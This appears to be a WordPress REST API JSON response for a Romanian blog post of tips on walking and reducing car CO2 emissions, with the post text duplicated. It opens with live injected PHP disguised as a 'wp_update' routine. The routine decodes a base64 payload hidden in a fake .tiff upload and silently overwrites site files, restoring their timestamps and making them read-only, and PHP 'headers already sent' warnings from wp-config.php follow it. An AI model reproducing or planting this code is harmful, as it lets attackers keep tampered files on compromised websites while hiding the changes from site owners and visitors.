$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794
{"id":86,"date":"2009-03-20T00:00:25","date_gmt":"2009-03-19T23:00:25","guid":{"rendered":"http:\/\/o9atitudine.ro\/?p=86"},"modified":"2009-04-07T14:40:53","modified_gmt":"2009-04-07T13:40:53","slug":"mersul-pe-jos","status":"publish","type":"post","link":"https:\/\/o9atitudine.ro\/info\/mersul-pe-jos\/","title":{"rendered":"Mersul pe jos"},"content":{"rendered":"

Mersul pe jos este benefic at\u00e2t pentru oameni, c\u00e2t \u015fi pentru mediu. Totu\u015fi, din c\u00e2nd \u00een c\u00e2nd, trebuie s\u0103 folosim mijloacele de transport. Atunci c\u00e2nd este cazul, este important s\u0103 facem alegerile cele mai bune \u015fi s\u0103 reducem emisiile de CO2.<\/p>\n

\u2022\u00a0\u00a0\u00a0 \u00cencerca\u0163i una dintre urm\u0103toarele metode pentru a ajunge la locul de munc\u0103: mersul cu bicicleta, mersul pe jos, folosirea unui automobil \u00eempreun\u0103 cu al\u0163i colegi, utilizarea transportului public, telelucrul.
\n\u00cen medie, un litru de carburant consumat de motorul unei ma\u015fini elimin\u0103 peste 2,5 kg de CO2.
\n\u2022\u00a0\u00a0\u00a0 \u00cencerca\u0163i s\u0103 evita\u0163i deplas\u0103rile scurte cu ma\u015fina, deoarece consumul de carburant \u015fi emisiile de CO2 sunt \u00een mod dispropor\u0163ionat mai mari c\u00e2nd motorul este \u00eenc\u0103 rece. Studiile arat\u0103 c\u0103 una din dou\u0103 deplas\u0103ri cu ma\u015fina \u00een mediul urban este pe o distan\u0163\u0103 de sub trei kilometrii, o distan\u0163\u0103 care poate fi acoperit\u0103 cu bicicleta sau pe jos.
\n\u2022\u00a0\u00a0\u00a0 \u00cencerca\u0163i s\u0103 v\u0103 sp\u0103la\u0163i ma\u015fina manual sau folosi\u0163i un jet de ap\u0103 sub presiune \u00een loc de a merge la o sp\u0103l\u0103torie auto. Sp\u0103l\u0103toriile consum\u0103 mai mult\u0103 energie \u015fi mai mult\u0103 ap\u0103 dec\u00e2t metoda tradi\u0163ional\u0103.
\n\u2022\u00a0\u00a0\u00a0 Dac\u0103 v\u0103 schimba\u0163i ma\u015fina, lua\u0163i \u00een considerare economia de carburant a noii ma\u015fini. Conform legisla\u0163iei comunitare, constructorii trebuie s\u0103 afi\u015feze informa\u0163ii despre emisiile de CO2 \u015fi despre consumul de carburant al noilor autovehicule \u00een magazinele de prezentare \u015fi \u00een materialele publicitare.
\n\u2022\u00a0\u00a0\u00a0 \u00a0 Un autovehicul cu un consum de 5 l\/100 km poate economisi \u00een fiecare an 750 kg de emisii de CO2.
\n\u2022\u00a0\u00a0\u00a0 Nu l\u0103sa\u0163i autovehiculul s\u0103 se \u00eenc\u0103lzeasc\u0103 pe loc – ve\u0163i consuma o cantitate mai mare de carburant dec\u00e2t pute\u0163i economisi prin ini\u0163ierea deplas\u0103rii cu motorul rece.
\n\u2022\u00a0\u00a0\u00a0 \u00a0Verifica\u0163i presiunea pneurilor: dac\u0103 presiunea este mai mic\u0103 cu 0,5 bari, autovehiculul va consuma cu 2,5% mai mult carburant pentru a \u00eenvinge rezisten\u0163a \u015fi va elibera cu 2,5% mai mult CO2.
\n\u2022\u00a0\u00a0\u00a0 Utiliza\u0163i ulei de motor de v\u00e2scozitate mic\u0103. Acesta lubrifiaz\u0103 mai bine p\u0103r\u0163ile mobile ale motorului dec\u00e2t uleiurile obi\u015fnuite, reduc\u00e2nd frecarea. Cele mai bune uleiuri pot reduce consumul de carburant \u015fi emisiile de CO2 cu peste 2,5%.
\n\u2022\u00a0\u00a0\u00a0 Nu circula\u0163i cu portbagajul de plafon gol. Acest lucru poate cre\u015fte consumul de carburant \u015fi emisiile de CO2 cu p\u00e2n\u0103 la 10% datorit\u0103 rezisten\u0163ei aerodinamice \u015fi a greut\u0103\u0163ii suplimentare. Demontarea portbagajului este o solu\u0163ie mai bun\u0103.
\n\u2022\u00a0\u00a0\u00a0 Nu circula\u0163i cu viteze ridicate – ve\u0163i consuma mai pu\u0163in\u0103 benzin\u0103 \u015fi emite mai pu\u0163in CO2. La o vitez\u0103 de peste 120 km\/h consumul de carburant cre\u015fte cu 30% \u00een compara\u0163ie cu consumul \u00eenregistrat la 80 km\/h. Treptele de vitez\u0103 4, 5 \u015fi 6 sunt cele mai economice din punct de vedere al consumului de carburant.
\n\u2022\u00a0\u00a0\u00a0 A\u0163i auzit de condusul ecologic? V\u0103 poate reduce consumul de carburant cu 5%. Pune\u0163i vehiculul \u00een mi\u015fcare f\u0103r\u0103 a ap\u0103sa pedala de accelera\u0163ie, schimba\u0163i treapta de vitez\u0103 imediat ce acest lucru este posibil \u015fi men\u0163ine\u0163i o vitez\u0103 constant\u0103.
\n\u2022\u00a0\u00a0\u00a0 Utiliza\u0163i instala\u0163ia de climatizare cu modera\u0163ie, aceasta cre\u015fte consumul de carburant \u015fi emisiile de CO2 cu aproximativ 5%. C\u00e2nd este cald afar\u0103, rula\u0163i pentru c\u00e2teva minute cu geamurile deschise, apoi \u00eenchide\u0163i-le \u015fi porni\u0163i instala\u0163ia de aer condi\u0163ionat. Aceast\u0103 metod\u0103 v\u0103 ajut\u0103 s\u0103 economisi\u0163i carburantul necesar pentru a reduce temperatura ini\u0163ial\u0103.
\n\u2022\u00a0\u00a0\u00a0 \u00a0\u00cencerca\u0163i s\u0103 c\u0103l\u0103tori\u0163i cu trenul. O persoan\u0103 care c\u0103l\u0103tore\u015fte singur\u0103 cu autovehiculul produce de trei ori mai multe emisii de CO2\/km dec\u00e2t dac\u0103 ar c\u0103l\u0103tori cu trenul.
\n\u2022\u00a0\u00a0\u00a0 G\u0103si\u0163i o alternativ\u0103 la avion. Transportul aerian este sursa de emisii de CO2 cu cea mai mare cre\u015ftere la nivel mondial. Dac\u0103 zbura\u0163i cu avionul, lua\u0163i \u00een considerare \u201ecompensarea\u201d emisiilor dumneavoastr\u0103 de carbon. Unele organiza\u0163ii calculeaz\u0103 emisiile generate de o persoan\u0103 \u015fi investe\u015fte capital \u00een energie regenerabil\u0103.
\nMersul pe jos este benefic at\u00e2t pentru oameni, c\u00e2t \u015fi pentru mediu. Totu\u015fi, din c\u00e2nd \u00een c\u00e2nd, trebuie s\u0103 folosim mijloacele de transport. Atunci c\u00e2nd este cazul, este important s\u0103 facem alegerile cele mai bune \u015fi s\u0103 reducem emisiile de CO2.<\/p>\n

\u2022\u00a0\u00a0\u00a0 \u00cencerca\u0163i una dintre urm\u0103toarele metode pentru a ajunge la locul de munc\u0103: mersul cu bicicleta, mersul pe jos, folosirea unui automobil \u00eempreun\u0103 cu al\u0163i colegi, utilizarea transportului public, telelucrul.
\n\u00cen medie, un litru de carburant consumat de motorul unei ma\u015fini elimin\u0103 peste 2,5 kg de CO2.
\n\u2022\u00a0\u00a0\u00a0 \u00cencerca\u0163i s\u0103 evita\u0163i deplas\u0103rile scurte cu ma\u015fina, deoarece consumul de carburant \u015fi emisiile de CO2 sunt \u00een mod dispropor\u0163ionat mai mari c\u00e2nd motorul este \u00eenc\u0103 rece. Studiile arat\u0103 c\u0103 una din dou\u0103 deplas\u0103ri cu ma\u015fina \u00een mediul urban este pe o distan\u0163\u0103 de sub trei kilometrii, o distan\u0163\u0103 care poate fi acoperit\u0103 cu bicicleta sau pe jos.
\n\u2022\u00a0\u00a0\u00a0 \u00cencerca\u0163i s\u0103 v\u0103 sp\u0103la\u0163i ma\u015fina manual sau folosi\u0163i un jet de ap\u0103 sub presiune \u00een loc de a merge la o sp\u0103l\u0103torie auto. Sp\u0103l\u0103toriile consum\u0103 mai mult\u0103 energie \u015fi mai mult\u0103 ap\u0103 dec\u00e2t metoda tradi\u0163ional\u0103.
\n\u2022\u00a0\u00a0\u00a0 Dac\u0103 v\u0103 schimba\u0163i ma\u015fina, lua\u0163i \u00een considerare economia de carburant a noii ma\u015fini. Conform legisla\u0163iei comunitare, constructorii trebuie s\u0103 afi\u015feze informa\u0163ii despre emisiile de CO2 \u015fi despre consumul de carburant al noilor autovehicule \u00een magazinele de prezentare \u015fi \u00een materialele publicitare.
\n\u2022\u00a0\u00a0\u00a0 \u00a0 Un autovehicul cu un consum de 5 l\/100 km poate economisi \u00een fiecare an 750 kg de emisii de CO2.
\n\u2022\u00a0\u00a0\u00a0 Nu l\u0103sa\u0163i autovehiculul s\u0103 se \u00eenc\u0103lzeasc\u0103 pe loc – ve\u0163i consuma o cantitate mai mare de carburant dec\u00e2t pute\u0163i economisi prin ini\u0163ierea deplas\u0103rii cu motorul rece.
\n\u2022\u00a0\u00a0\u00a0 \u00a0Verifica\u0163i presiunea pneurilor: dac\u0103 presiunea este mai mic\u0103 cu 0,5 bari, autovehiculul va consuma cu 2,5% mai mult carburant pentru a \u00eenvinge rezisten\u0163a \u015fi va elibera cu 2,5% mai mult CO2.
\n\u2022\u00a0\u00a0\u00a0 Utiliza\u0163i ulei de motor de v\u00e2scozitate mic\u0103. Acesta lubrifiaz\u0103 mai bine p\u0103r\u0163ile mobile ale motorului dec\u00e2t uleiurile obi\u015fnuite, reduc\u00e2nd frecarea. Cele mai bune uleiuri pot reduce consumul de carburant \u015fi emisiile de CO2 cu peste 2,5%.
\n\u2022\u00a0\u00a0\u00a0 Nu circula\u0163i cu portbagajul de plafon gol. Acest lucru poate cre\u015fte consumul de carburant \u015fi emisiile de CO2 cu p\u00e2n\u0103 la 10% datorit\u0103 rezisten\u0163ei aerodinamice \u015fi a greut\u0103\u0163ii suplimentare. Demontarea portbagajului este o solu\u0163ie mai bun\u0103.
\n\u2022\u00a0\u00a0\u00a0 Nu circula\u0163i cu viteze ridicate – ve\u0163i consuma mai pu\u0163in\u0103 benzin\u0103 \u015fi emite mai pu\u0163in CO2. La o vitez\u0103 de peste 120 km\/h consumul de carburant cre\u015fte cu 30% \u00een compara\u0163ie cu consumul \u00eenregistrat la 80 km\/h. Treptele de vitez\u0103 4, 5 \u015fi 6 sunt cele mai economice din punct de vedere al consumului de carburant.
\n\u2022\u00a0\u00a0\u00a0 A\u0163i auzit de condusul ecologic? V\u0103 poate reduce consumul de carburant cu 5%. Pune\u0163i vehiculul \u00een mi\u015fcare f\u0103r\u0103 a ap\u0103sa pedala de accelera\u0163ie, schimba\u0163i treapta de vitez\u0103 imediat ce acest lucru este posibil \u015fi men\u0163ine\u0163i o vitez\u0103 constant\u0103.
\n\u2022\u00a0\u00a0\u00a0 Utiliza\u0163i instala\u0163ia de climatizare cu modera\u0163ie, aceasta cre\u015fte consumul de carburant \u015fi emisiile de CO2 cu aproximativ 5%. C\u00e2nd este cald afar\u0103, rula\u0163i pentru c\u00e2teva minute cu geamurile deschise, apoi \u00eenchide\u0163i-le \u015fi porni\u0163i instala\u0163ia de aer condi\u0163ionat. Aceast\u0103 metod\u0103 v\u0103 ajut\u0103 s\u0103 economisi\u0163i carburantul necesar pentru a reduce temperatura ini\u0163ial\u0103.
\n\u2022\u00a0\u00a0\u00a0 \u00a0\u00cencerca\u0163i s\u0103 c\u0103l\u0103tori\u0163i cu trenul. O persoan\u0103 care c\u0103l\u0103tore\u015fte singur\u0103 cu autovehiculul produce de trei ori mai multe emisii de CO2\/km dec\u00e2t dac\u0103 ar c\u0103l\u0103tori cu trenul.
\n\u2022\u00a0\u00a0\u00a0 G\u0103si\u0163i o alternativ\u0103 la avion. Transportul aerian este sursa de emisii de CO2 cu cea mai mare cre\u015ftere la nivel mondial. Dac\u0103 zbura\u0163i cu avionul, lua\u0163i \u00een considerare \u201ecompensarea\u201d emisiilor dumneavoastr\u0103 de carbon. Unele organiza\u0163ii calculeaz\u0103 emisiile generate de o persoan\u0103 \u015fi investe\u015fte capital \u00een energie regenerabil\u0103.<\/p>\n","protected":false},"excerpt":{"rendered":"

Mersul pe jos este benefic at\u00e2t pentru oameni, c\u00e2t \u015fi pentru mediu. Totu\u015fi, din c\u00e2nd \u00een c\u00e2nd, trebuie s\u0103 folosim mijloacele de transport. Atunci c\u00e2nd este cazul, este important s\u0103 facem alegerile cele mai bune \u015fi s\u0103 reducem emisiile de CO2.<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,15],"tags":[104,124,123,53],"_links":{"self":[{"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/86"}],"collection":[{"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/comments?post=86"}],"version-history":[{"count":2,"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/86\/revisions"}],"predecessor-version":[{"id":211,"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/86\/revisions\/211"}],"wp:attachment":[{"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/media?parent=86"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/categories?post=86"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/tags?post=86"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}